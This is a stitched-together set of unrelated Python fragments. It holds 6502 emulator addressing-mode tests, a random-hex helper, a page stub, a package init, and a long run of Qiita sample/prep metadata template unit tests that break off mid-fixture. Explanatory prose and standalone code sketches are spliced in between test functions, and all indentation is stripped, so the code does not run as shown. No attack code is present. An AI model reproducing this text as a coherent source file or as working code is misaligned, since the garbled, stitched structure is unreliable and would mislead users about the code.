computer.cpu.registers["PC"].set(0x00)
computer.cpu.registers["A"].set(0x13)
aam = AccumulatorAddressingMode()
inst_str = aam.get_inst_str(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert type(aam) == AccumulatorAddressingMode
(address, value) = aam.get_value(
computer.cpu.flags, computer.cpu.registers, computer.memory
)
assert address is None
assert value == 0x13
assert computer.cpu.registers["PC"].get() == 0x00
assert inst_str == ""
def test_cpu_addressing_mode_absolute_indirect_page_boundary_bug_get_value(setup):
computer = setup
computer.reset()
# Pointer to the pointer to the effective address
computer.memory.write(0x0B, 0x10)
computer.memory.write(0x0C, 0x20)
# Pointer to the effective address
computer.memory.write(0x2010, 0x33)
computer.memory.write(0x2011, 0x55)
computer.memory.write(0x5533, 0x11)
computer.cpu.registers["PC"].set(0x0B)
aam = AbsoluteIndirectPageBoundaryBugAddressingMode(3)
assert type(aam) == AbsoluteIndirectPageBoundaryBugAddressingMode
value = aam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
# adl and adh are the effective address low and high bytes
# not the original address (PC + 1, PC + 2)
assert aam.adl == 0x33
assert aam.adh == 0x55
assert value == (0x5533, 0x11)
assert computer.cpu.registers["PC"].get() == 0x0D
def test_cpu_addressing_mode_absolute_indirect_page_boundary_bug_wrap_get_value(setup):
computer = setup
computer.reset()
# Pointer to the pointer to the effective address
computer.memory.write(0x00FF, 0x10)
computer.memory.write(0x0000, 0x20)
# Pointer to the effective address
computer.memory.write(0x2010, 0x33)
computer.memory.write(0x2011, 0x55)
computer.memory.write(0x5533, 0x11)
computer.cpu.registers["PC"].set(0x00FF)
aam = AbsoluteIndirectPageBoundaryBugAddressingMode(3)
assert type(aam) == AbsoluteIndirectPageBoundaryBugAddressingMode
value = aam.get_value(computer.cpu.flags, computer.cpu.registers, computer.memory)
# adl and adh are the effective address low and high bytes
# not the original address (PC + 1, PC + 2)
assert aam.adl == 0x33
assert aam.adh == 0x55
assert value == (0x5533, 0x11)
# Technically, the JMP instruction is the only instruction that uses this "buggy"
# mode, so this shouldn't matter
assert computer.cpu.registers["PC"].get() == 0x101
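The wrap behaviour exercised above is the classic NMOS 6502 JMP (indirect) page-boundary bug. A minimal standalone sketch of the buggy effective-address computation (hypothetical helper, not part of the emulator under test):

```python
def buggy_indirect_jmp_target(memory, pointer):
    """Effective address of JMP (indirect) on an NMOS 6502.

    When the pointer sits on a page boundary ($xxFF), the high byte of
    the target is fetched from $xx00 of the *same* page: only the low
    byte of the pointer increments; the carry into the page is dropped.
    """
    lo = memory[pointer]
    hi = memory[(pointer & 0xFF00) | ((pointer + 1) & 0x00FF)]
    return (hi << 8) | lo

# Mirrors the wrap test above: $00FF holds $10, the high byte wraps
# around to $0000 (which holds $20), so the target is $2010.
memory = {0x00FF: 0x10, 0x0000: 0x20}
assert buggy_indirect_jmp_target(memory, 0x00FF) == 0x2010
```

For a pointer that does not end in $FF the computation degenerates to the ordinary two-byte little-endian fetch, which is why only JMP at a page boundary ever exposes the bug.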
# modules/msa/msa/utils/misc.py
import binascii, os
def random_hex_string(length=40):
return binascii.hexlify(os.urandom(int(length / 2))).decode()
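A usage sketch for the helper above. One quirk worth noting: `int(length / 2)` floors odd lengths, so an odd `length` yields one character fewer than requested:

```python
import binascii, os

def random_hex_string(length=40):
    return binascii.hexlify(os.urandom(int(length / 2))).decode()

token = random_hex_string(16)
assert len(token) == 16
assert all(c in '0123456789abcdef' for c in token)
# Odd lengths round down: int(5 / 2) == 2 bytes == 4 hex characters.
assert len(random_hex_string(5)) == 4
```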
# pages/matched_page.py
from pages.base_page import BasePage
class MatchedPage(BasePage):
pass
# scout/commands/export/__init__.py
from .export_command import export
# qiita_db/test/test_metadata_template.py
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from future.builtins import zip
from six import StringIO
from unittest import TestCase, main
from datetime import datetime
from tempfile import mkstemp
from time import strftime
from os import close, remove
from os.path import join, basename
from collections import Iterable
import numpy.testing as npt
import pandas as pd
from pandas.util.testing import assert_frame_equal
from qiita_core.util import qiita_test_checker
from qiita_core.exceptions import IncompetentQiitaDeveloperError
from qiita_db.exceptions import (QiitaDBDuplicateError, QiitaDBUnknownIDError,
QiitaDBNotImplementedError,
QiitaDBDuplicateHeaderError,
QiitaDBExecutionError,
QiitaDBColumnError, QiitaDBError,
QiitaDBWarning)
from qiita_db.study import Study, StudyPerson
from qiita_db.user import User
from qiita_db.data import RawData
from qiita_db.util import (exists_table, get_db_files_base_dir, get_mountpoint,
get_count, get_table_cols)
from qiita_db.metadata_template import (
_get_datatypes, _as_python_types, MetadataTemplate, SampleTemplate,
PrepTemplate, BaseSample, PrepSample, Sample, _prefix_sample_names_with_id,
load_template_to_dataframe, get_invalid_sample_names)
class TestUtilMetadataMap(TestCase):
"""Tests some utility functions on the metadata_template module"""
def setUp(self):
metadata_dict = {
'Sample1': {'int_col': 1, 'float_col': 2.1, 'str_col': 'str1'},
'Sample2': {'int_col': 2, 'float_col': 3.1, 'str_col': '200'},
'Sample3': {'int_col': 3, 'float_col': 3, 'str_col': 'string30'},
}
self.metadata_map = pd.DataFrame.from_dict(metadata_dict,
orient='index')
self.headers = ['float_col', 'str_col', 'int_col']
def test_get_datatypes(self):
"""Correctly returns the data types of each column"""
obs = _get_datatypes(self.metadata_map.ix[:, self.headers])
exp = ['float8', 'varchar', 'integer']
self.assertEqual(obs, exp)
def test_as_python_types(self):
"""Correctly returns the columns as python types"""
obs = _as_python_types(self.metadata_map, self.headers)
exp = [[2.1, 3.1, 3],
['str1', '200', 'string30'],
[1, 2, 3]]
self.assertEqual(obs, exp)
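The column typing checked above can be sketched with a small stand-in for `_get_datatypes` applied to one column at a time. This is assumed behaviour inferred from the expected values in the tests, not the actual qiita_db implementation:

```python
def get_datatype(values):
    # Hypothetical stand-in: map a column's Python values onto a
    # postgres column type, as the test above expects.
    if all(isinstance(v, int) and not isinstance(v, bool) for v in values):
        return 'integer'
    if all(isinstance(v, (int, float)) for v in values):
        return 'float8'
    return 'varchar'

columns = ([2.1, 3.1, 3], ['str1', '200', 'string30'], [1, 2, 3])
assert [get_datatype(col) for col in columns] == \
    ['float8', 'varchar', 'integer']
```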
def test_prefix_sample_names_with_id(self):
exp_metadata_dict = {
'1.Sample1': {'int_col': 1, 'float_col': 2.1, 'str_col': 'str1'},
'1.Sample2': {'int_col': 2, 'float_col': 3.1, 'str_col': '200'},
'1.Sample3': {'int_col': 3, 'float_col': 3, 'str_col': 'string30'},
}
exp_df = pd.DataFrame.from_dict(exp_metadata_dict, orient='index')
_prefix_sample_names_with_id(self.metadata_map, 1)
self.metadata_map.sort_index(inplace=True)
exp_df.sort_index(inplace=True)
assert_frame_equal(self.metadata_map, exp_df)
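Outside of pandas, the prefixing contract verified above reduces to rewriting the mapping keys. A dict-based sketch (hypothetical helper name, not the qiita_db function itself, which mutates a DataFrame index in place):

```python
def prefix_sample_names_with_id(metadata, study_id):
    # Prepend "<study_id>." to every sample name, as the test expects.
    return {'%s.%s' % (study_id, name): row
            for name, row in metadata.items()}

md = {'Sample1': {'int_col': 1}, 'Sample2': {'int_col': 2}}
prefixed = prefix_sample_names_with_id(md, 1)
assert sorted(prefixed) == ['1.Sample1', '1.Sample2']
assert prefixed['1.Sample1'] == {'int_col': 1}
```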
@qiita_test_checker()
class TestBaseSample(TestCase):
"""Tests the BaseSample class"""
def test_init(self):
"""BaseSample init should raise an error (it's a base class)"""
with self.assertRaises(IncompetentQiitaDeveloperError):
BaseSample('SKM7.640188', SampleTemplate(1))
def test_exists(self):
"""exists should raise an error if called from the base class"""
with self.assertRaises(IncompetentQiitaDeveloperError):
BaseSample.exists('SKM7.640188', SampleTemplate(1))
@qiita_test_checker()
class TestSample(TestCase):
"""Tests the Sample class"""
def setUp(self):
self.sample_template = SampleTemplate(1)
self.sample_id = '1.SKB8.640193'
self.tester = Sample(self.sample_id, self.sample_template)
self.exp_categories = {'physical_location', 'has_physical_specimen',
'has_extracted_data', 'sample_type',
'required_sample_info_status',
'collection_timestamp', 'host_subject_id',
'description', 'season_environment',
'assigned_from_geo', 'texture', 'taxon_id',
'depth', 'host_taxid', 'common_name',
'water_content_soil', 'elevation', 'temp',
'tot_nitro', 'samp_salinity', 'altitude',
'env_biome', 'country', 'ph', 'anonymized_name',
'tot_org_carb', 'description_duplicate',
'env_feature', 'latitude', 'longitude'}
def test_init_unknown_error(self):
"""Init raises an error if the sample id is not found in the template
"""
with self.assertRaises(QiitaDBUnknownIDError):
Sample('Not_a_Sample', self.sample_template)
def test_init_wrong_template(self):
"""Raises an error if using a PrepTemplate instead of SampleTemplate"""
with self.assertRaises(IncompetentQiitaDeveloperError):
Sample('SKB8.640193', PrepTemplate(1))
def test_init(self):
"""Init correctly initializes the sample object"""
sample = Sample(self.sample_id, self.sample_template)
        # Check that the internal id has been correctly set
        self.assertEqual(sample._id, '1.SKB8.640193')
        # Check that the internal template has been correctly set
        self.assertEqual(sample._md_template, self.sample_template)
        # Check that the internal dynamic table name has been correctly set
        self.assertEqual(sample._dynamic_table, "sample_1")
def test_eq_true(self):
"""Equality correctly returns true"""
other = Sample(self.sample_id, self.sample_template)
self.assertTrue(self.tester == other)
def test_eq_false_type(self):
"""Equality returns false if types are not equal"""
other = PrepSample(self.sample_id, PrepTemplate(1))
self.assertFalse(self.tester == other)
def test_eq_false_id(self):
"""Equality returns false if ids are different"""
other = Sample('1.SKD8.640184', self.sample_template)
self.assertFalse(self.tester == other)
def test_exists_true(self):
"""Exists returns true if the sample exists"""
self.assertTrue(Sample.exists(self.sample_id, self.sample_template))
def test_exists_false(self):
        """Exists returns false if the sample does not exist"""
self.assertFalse(Sample.exists('Not_a_Sample', self.sample_template))
def test_get_categories(self):
"""Correctly returns the set of category headers"""
obs = self.tester._get_categories(self.conn_handler)
self.assertEqual(obs, self.exp_categories)
def test_len(self):
"""Len returns the correct number of categories"""
self.assertEqual(len(self.tester), 30)
def test_getitem_required(self):
"""Get item returns the correct metadata value from the required table
"""
self.assertEqual(self.tester['physical_location'], 'ANL')
self.assertEqual(self.tester['collection_timestamp'],
datetime(2011, 11, 11, 13, 00, 00))
self.assertTrue(self.tester['has_physical_specimen'])
def test_getitem_dynamic(self):
"""Get item returns the correct metadata value from the dynamic table
"""
self.assertEqual(self.tester['SEASON_ENVIRONMENT'], 'winter')
self.assertEqual(self.tester['depth'], 0.15)
def test_getitem_id_column(self):
"""Get item returns the correct metadata value from the changed column
"""
self.assertEqual(self.tester['required_sample_info_status'],
'completed')
def test_getitem_error(self):
        """Get item raises an error if category does not exist"""
with self.assertRaises(KeyError):
self.tester['Not_a_Category']
def test_setitem(self):
with self.assertRaises(QiitaDBColumnError):
self.tester['column that does not exist'] = 0.30
self.assertEqual(self.tester['tot_nitro'], 1.41)
self.tester['tot_nitro'] = '1234.5'
self.assertEqual(self.tester['tot_nitro'], 1234.5)
def test_delitem(self):
"""delitem raises an error (currently not allowed)"""
with self.assertRaises(QiitaDBNotImplementedError):
del self.tester['DEPTH']
def test_iter(self):
"""iter returns an iterator over the category headers"""
obs = self.tester.__iter__()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_categories)
def test_contains_true(self):
"""contains returns true if the category header exists"""
self.assertTrue('DEPTH' in self.tester)
self.assertTrue('depth' in self.tester)
def test_contains_false(self):
        """contains returns false if the category header does not exist"""
self.assertFalse('Not_a_Category' in self.tester)
def test_keys(self):
"""keys returns an iterator over the metadata headers"""
obs = self.tester.keys()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_categories)
def test_values(self):
"""values returns an iterator over the values"""
obs = self.tester.values()
self.assertTrue(isinstance(obs, Iterable))
exp = {'ANL', True, True, 'ENVO:soil', 'completed',
datetime(2011, 11, 11, 13, 00, 00), '1001:M7',
'Cannabis Soil Microbiome', 'winter', 'n',
'64.6 sand, 17.6 silt, 17.8 clay', '1118232', 0.15, '3483',
'root metagenome', 0.164, 114, 15, 1.41, 7.15, 0,
'ENVO:Temperate grasslands, savannas, and shrubland biome',
'GAZ:United States of America', 6.94, 'SKB8', 5,
'Burmese root', 'ENVO:plant-associated habitat', 74.0894932572,
65.3283470202}
self.assertEqual(set(obs), exp)
def test_items(self):
"""items returns an iterator over the (key, value) tuples"""
obs = self.tester.items()
self.assertTrue(isinstance(obs, Iterable))
exp = {('physical_location', 'ANL'), ('has_physical_specimen', True),
('has_extracted_data', True), ('sample_type', 'ENVO:soil'),
('required_sample_info_status', 'completed'),
('collection_timestamp', datetime(2011, 11, 11, 13, 00, 00)),
('host_subject_id', '1001:M7'),
('description', 'Cannabis Soil Microbiome'),
('season_environment', 'winter'), ('assigned_from_geo', 'n'),
('texture', '64.6 sand, 17.6 silt, 17.8 clay'),
('taxon_id', '1118232'), ('depth', 0.15),
('host_taxid', '3483'), ('common_name', 'root metagenome'),
('water_content_soil', 0.164), ('elevation', 114), ('temp', 15),
('tot_nitro', 1.41), ('samp_salinity', 7.15), ('altitude', 0),
('env_biome',
'ENVO:Temperate grasslands, savannas, and shrubland biome'),
('country', 'GAZ:United States of America'), ('ph', 6.94),
('anonymized_name', 'SKB8'), ('tot_org_carb', 5),
('description_duplicate', 'Burmese root'),
('env_feature', 'ENVO:plant-associated habitat'),
('latitude', 74.0894932572),
('longitude', 65.3283470202)}
self.assertEqual(set(obs), exp)
def test_get(self):
        """get returns the correct metadata value"""
self.assertEqual(self.tester.get('SEASON_ENVIRONMENT'), 'winter')
self.assertEqual(self.tester.get('depth'), 0.15)
def test_get_none(self):
        """get returns None if the category is not present"""
self.assertTrue(self.tester.get('Not_a_Category') is None)
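The dict-like protocol TestSample exercises (len, getitem, iter, contains, keys/values/items, get) is what `collections.abc.Mapping` provides for free once three methods exist. A read-only sketch (hypothetical class, with the case-insensitive lookup the tests above rely on):

```python
from collections.abc import Mapping

class ReadOnlySample(Mapping):
    """Read-only, dict-like view over a sample's metadata."""

    def __init__(self, metadata):
        self._metadata = dict(metadata)

    def __getitem__(self, category):
        # Category lookup is case-insensitive, as in the tests above.
        return self._metadata[category.lower()]

    def __iter__(self):
        return iter(self._metadata)

    def __len__(self):
        return len(self._metadata)

# Mapping supplies get, keys, values, items and __contains__ for free.
s = ReadOnlySample({'depth': 0.15, 'season_environment': 'winter'})
assert s['DEPTH'] == 0.15
assert s.get('Not_a_Category') is None
assert len(s) == 2
```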
@qiita_test_checker()
class TestPrepSample(TestCase):
"""Tests the PrepSample class"""
def setUp(self):
self.prep_template = PrepTemplate(1)
self.sample_id = '1.SKB8.640193'
self.tester = PrepSample(self.sample_id, self.prep_template)
self.exp_categories = {'center_name', 'center_project_name',
'emp_status', 'barcodesequence',
'library_construction_protocol',
'linkerprimersequence', 'target_subfragment',
'target_gene', 'run_center', 'run_prefix',
'run_date', 'experiment_center',
'experiment_design_description',
'experiment_title', 'platform', 'samp_size',
'sequencing_meth', 'illumina_technology',
'sample_center', 'pcr_primers', 'study_center'}
def test_init_unknown_error(self):
"""Init errors if the PrepSample id is not found in the template"""
with self.assertRaises(QiitaDBUnknownIDError):
PrepSample('Not_a_Sample', self.prep_template)
def test_init_wrong_template(self):
"""Raises an error if using a SampleTemplate instead of PrepTemplate"""
with self.assertRaises(IncompetentQiitaDeveloperError):
PrepSample('1.SKB8.640193', SampleTemplate(1))
def test_init(self):
"""Init correctly initializes the PrepSample object"""
sample = PrepSample(self.sample_id, self.prep_template)
        # Check that the internal id has been correctly set
        self.assertEqual(sample._id, '1.SKB8.640193')
        # Check that the internal template has been correctly set
        self.assertEqual(sample._md_template, self.prep_template)
        # Check that the internal dynamic table name has been correctly set
        self.assertEqual(sample._dynamic_table, "prep_1")
def test_eq_true(self):
"""Equality correctly returns true"""
other = PrepSample(self.sample_id, self.prep_template)
self.assertTrue(self.tester == other)
def test_eq_false_type(self):
"""Equality returns false if types are not equal"""
other = Sample(self.sample_id, SampleTemplate(1))
self.assertFalse(self.tester == other)
def test_eq_false_id(self):
"""Equality returns false if ids are different"""
other = PrepSample('1.SKD8.640184', self.prep_template)
self.assertFalse(self.tester == other)
def test_exists_true(self):
"""Exists returns true if the PrepSample exists"""
self.assertTrue(PrepSample.exists(self.sample_id, self.prep_template))
def test_exists_false(self):
        """Exists returns false if the PrepSample does not exist"""
self.assertFalse(PrepSample.exists('Not_a_Sample', self.prep_template))
def test_get_categories(self):
"""Correctly returns the set of category headers"""
obs = self.tester._get_categories(self.conn_handler)
self.assertEqual(obs, self.exp_categories)
def test_len(self):
"""Len returns the correct number of categories"""
self.assertEqual(len(self.tester), 21)
def test_getitem_required(self):
"""Get item returns the correct metadata value from the required table
"""
self.assertEqual(self.tester['center_name'], 'ANL')
self.assertTrue(self.tester['center_project_name'] is None)
def test_getitem_dynamic(self):
"""Get item returns the correct metadata value from the dynamic table
"""
self.assertEqual(self.tester['pcr_primers'],
'FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT')
self.assertEqual(self.tester['barcodesequence'], 'AGCGCTCACATC')
def test_getitem_id_column(self):
"""Get item returns the correct metadata value from the changed column
"""
self.assertEqual(self.tester['emp_status'], 'EMP')
def test_getitem_error(self):
        """Get item raises an error if category does not exist"""
with self.assertRaises(KeyError):
self.tester['Not_a_Category']
def test_setitem(self):
"""setitem raises an error (currently not allowed)"""
with self.assertRaises(QiitaDBNotImplementedError):
self.tester['barcodesequence'] = 'GTCCGCAAGTTA'
def test_delitem(self):
"""delitem raises an error (currently not allowed)"""
with self.assertRaises(QiitaDBNotImplementedError):
del self.tester['pcr_primers']
def test_iter(self):
"""iter returns an iterator over the category headers"""
obs = self.tester.__iter__()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_categories)
def test_contains_true(self):
"""contains returns true if the category header exists"""
self.assertTrue('BarcodeSequence' in self.tester)
self.assertTrue('barcodesequence' in self.tester)
def test_contains_false(self):
"""contains returns false if the category header does not exists"""
self.assertFalse('Not_a_Category' in self.tester)
def test_keys(self):
"""keys returns an iterator over the metadata headers"""
obs = self.tester.keys()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_categories)
def test_values(self):
"""values returns an iterator over the values"""
obs = self.tester.values()
self.assertTrue(isinstance(obs, Iterable))
exp = {'ANL', None, None, None, 'EMP', 'AGCGCTCACATC',
'This analysis was done as in Caporaso et al 2011 Genome '
'research. The PCR primers (F515/R806) were developed against '
'the V4 region of the 16S rRNA (both bacteria and archaea), '
'which we determined would yield optimal community clustering '
'with reads of this length using a procedure similar to that of'
' ref. 15. [For reference, this primer pair amplifies the '
'region 533_786 in the Escherichia coli strain 83972 sequence '
'(greengenes accession no. prokMSA_id:470367).] The reverse PCR'
' primer is barcoded with a 12-base error-correcting Golay code'
' to facilitate multiplexing of up to 1,500 samples per lane, '
'and both PCR primers contain sequencer adapter regions.',
'GTGCCAGCMGCCGCGGTAA', 'V4', '16S rRNA', 'ANL',
's_G1_L001_sequences', '8/1/12', 'ANL',
'micro biome of soil and rhizosphere of cannabis plants from '
'CA', 'Cannabis Soil Microbiome', 'Illumina', '.25,g',
'Sequencing by synthesis', 'MiSeq', 'ANL',
'FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT', 'CCME'}
self.assertEqual(set(obs), exp)
def test_items(self):
"""items returns an iterator over the (key, value) tuples"""
obs = self.tester.items()
self.assertTrue(isinstance(obs, Iterable))
exp = {('center_name', 'ANL'), ('center_project_name', None),
('emp_status', 'EMP'), ('barcodesequence', 'AGCGCTCACATC'),
('library_construction_protocol',
'This analysis was done as in Caporaso et al 2011 Genome '
'research. The PCR primers (F515/R806) were developed against '
'the V4 region of the 16S rRNA (both bacteria and archaea), '
'which we determined would yield optimal community clustering '
'with reads of this length using a procedure similar to that '
'of ref. 15. [For reference, this primer pair amplifies the '
'region 533_786 in the Escherichia coli strain 83972 sequence '
'(greengenes accession no. prokMSA_id:470367).] The reverse '
'PCR primer is barcoded with a 12-base error-correcting Golay '
'code to facilitate multiplexing of up to 1,500 samples per '
'lane, and both PCR primers contain sequencer adapter '
'regions.'), ('linkerprimersequence', 'GTGCCAGCMGCCGCGGTAA'),
('target_subfragment', 'V4'), ('target_gene', '16S rRNA'),
('run_center', 'ANL'), ('run_prefix', 's_G1_L001_sequences'),
('run_date', '8/1/12'), ('experiment_center', 'ANL'),
('experiment_design_description',
'micro biome of soil and rhizosphere of cannabis plants '
'from CA'), ('experiment_title', 'Cannabis Soil Microbiome'),
('platform', 'Illumina'), ('samp_size', '.25,g'),
('sequencing_meth', 'Sequencing by synthesis'),
('illumina_technology', 'MiSeq'), ('sample_center', 'ANL'),
('pcr_primers',
'FWD:GTGCCAGCMGCCGCGGTAA; REV:GGACTACHVGGGTWTCTAAT'),
('study_center', 'CCME')}
self.assertEqual(set(obs), exp)
def test_get(self):
        """get returns the correct metadata value"""
self.assertEqual(self.tester.get('barcodesequence'), 'AGCGCTCACATC')
def test_get_none(self):
        """get returns None if the category is not present"""
self.assertTrue(self.tester.get('Not_a_Category') is None)
@qiita_test_checker()
class TestMetadataTemplate(TestCase):
"""Tests the MetadataTemplate base class"""
def setUp(self):
self.study = Study(1)
def test_init(self):
"""Init raises an error because it's not called from a subclass"""
with self.assertRaises(IncompetentQiitaDeveloperError):
MetadataTemplate(1)
def test_create(self):
"""Create raises an error because it's not called from a subclass"""
with self.assertRaises(QiitaDBNotImplementedError):
MetadataTemplate.create()
def test_exist(self):
"""Exists raises an error because it's not called from a subclass"""
with self.assertRaises(IncompetentQiitaDeveloperError):
MetadataTemplate.exists(self.study)
def test_table_name(self):
"""table name raises an error because it's not called from a subclass
"""
with self.assertRaises(IncompetentQiitaDeveloperError):
MetadataTemplate._table_name(self.study)
@qiita_test_checker()
class TestSampleTemplate(TestCase):
"""Tests the SampleTemplate class"""
def setUp(self):
self.metadata_dict = {
'Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'int_column': 1,
'latitude': 42.42,
'longitude': 41.41},
'Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'int_column': 2,
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'latitude': 4.2,
'longitude': 1.1},
'Sample3': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'int_column': 3,
'latitude': 4.8,
'longitude': 4.41},
}
self.metadata = pd.DataFrame.from_dict(self.metadata_dict,
orient='index')
metadata_str_prefix_dict = {
'foo.Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'latitude': 42.42,
'longitude': 41.41},
'bar.Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'latitude': 4.2,
'longitude': 1.1},
'foo.Sample3': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'latitude': 4.8,
'longitude': 4.41},
}
self.metadata_str_prefix = pd.DataFrame.from_dict(
metadata_str_prefix_dict, orient='index')
metadata_int_prefix_dict = {
'12.Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'latitude': 42.42,
'longitude': 41.41},
'12.Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'latitude': 4.2,
'longitude': 1.1},
'12.Sample3': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'latitude': 4.8,
'longitude': 4.41},
}
self.metadata_int_pref = pd.DataFrame.from_dict(
metadata_int_prefix_dict, orient='index')
metadata_prefixed_dict = {
'2.Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'latitude': 42.42,
'longitude': 41.41},
'2.Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'latitude': 4.2,
'longitude': 1.1},
'2.Sample3': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': 'type1',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'latitude': 4.8,
'longitude': 4.41},
}
self.metadata_prefixed = pd.DataFrame.from_dict(
metadata_prefixed_dict, orient='index')
self.test_study = Study(1)
info = {
"timeseries_type_id": 1,
"metadata_complete": True,
"mixs_compliant": True,
"number_samples_collected": 25,
"number_samples_promised": 28,
"portal_type_id": 3,
"study_alias": "FCM",
"study_description": "Microbiome of people who eat nothing but "
"fried chicken",
"study_abstract": "Exploring how a high fat diet changes the "
"gut microbiome",
"emp_person_id": StudyPerson(2),
"principal_investigator_id": StudyPerson(3),
"lab_person_id": StudyPerson(1)
}
self.new_study = Study.create(User('test@foo.bar'),
"Fried Chicken Microbiome", [1], info)
self.tester = SampleTemplate(1)
self.exp_sample_ids = {
'1.SKB1.640202', '1.SKB2.640194', '1.SKB3.640195', '1.SKB4.640189',
'1.SKB5.640181', '1.SKB6.640176', '1.SKB7.640196', '1.SKB8.640193',
'1.SKB9.640200', '1.SKD1.640179', '1.SKD2.640178', '1.SKD3.640198',
'1.SKD4.640185', '1.SKD5.640186', '1.SKD6.640190', '1.SKD7.640191',
'1.SKD8.640184', '1.SKD9.640182', '1.SKM1.640183', '1.SKM2.640199',
'1.SKM3.640197', '1.SKM4.640180', '1.SKM5.640177', '1.SKM6.640187',
'1.SKM7.640188', '1.SKM8.640201', '1.SKM9.640192'}
self._clean_up_files = []
self.metadata_dict_updated_dict = {
'Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '6',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'int_column': 1,
'latitude': 42.42,
'longitude': 41.41},
'Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '5',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'the only one',
'Description': 'Test Sample 2',
'str_column': 'Value for sample 2',
'int_column': 2,
'latitude': 4.2,
'longitude': 1.1},
'Sample3': {'physical_location': 'new location',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '10',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 3',
'str_column': 'Value for sample 3',
'int_column': 3,
'latitude': 4.8,
'longitude': 4.41},
}
self.metadata_dict_updated = pd.DataFrame.from_dict(
self.metadata_dict_updated_dict, orient='index')
metadata_dict_updated_sample_error = {
'Sample1': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '6',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
'host_subject_id': 'NotIdentified',
'Description': 'Test Sample 1',
'str_column': 'Value for sample 1',
'int_column': 1,
'latitude': 42.42,
'longitude': 41.41},
'Sample2': {'physical_location': 'location1',
'has_physical_specimen': True,
'has_extracted_data': True,
'sample_type': '5',
'required_sample_info_status': 'received',
'collection_timestamp':
datetime(2014, 5, 29, 12, 24, 51),
